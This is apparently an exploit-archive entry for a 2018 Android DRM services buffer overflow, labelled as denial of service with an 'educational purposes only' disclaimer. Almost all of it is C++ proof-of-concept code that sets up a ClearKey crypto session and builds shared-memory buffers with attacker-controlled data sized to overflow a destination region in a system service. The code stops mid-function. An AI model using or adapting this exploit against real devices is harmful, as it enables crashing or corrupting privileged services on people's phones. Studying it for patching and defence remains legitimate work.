Exploits / Vulnerability Discovered : 2018-03-15 |
Type : dos |
Platform : android
This exploit / vulnerability Android drm services buffer overflow is for educational purposes only and if it is used you will do on your own risk!
static void executeOverflow()
{
// Get an interface to a remote CryptoHal object.
sp<ICrypto> crypto = getCrypto();
if (crypto == NULL) {
return;
}
if (!setClearKey(crypto)) {
return;
}
// From here we're done with the preparations and go into the
// vulnerability PoC.
sp<MemoryHeapBase> heap = new MemoryHeapBase(DATA_SIZE);
// This line is to merely show that we have full control over the data
// written in the overflow.
memset(heap->getBase(), 'A', DATA_SIZE);
sp<MemoryBase> sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
sp<MemoryBase> destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
DEST_OFFSET);
int heapSeqNum = crypto->setHeap(heap);
if (heapSeqNum < 0) {
fprintf(stderr, "setHeap failed.\n");
return;
}
CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
.mHeapSeqNum = heapSeqNum };
// mNumBytesOfClearData is the actual size of data to be copied.
CryptoPlugin::SubSample subSamples[] = { {
.mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
ICrypto::DestinationBuffer destination = {
.mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
.mSharedMemory = destMemory };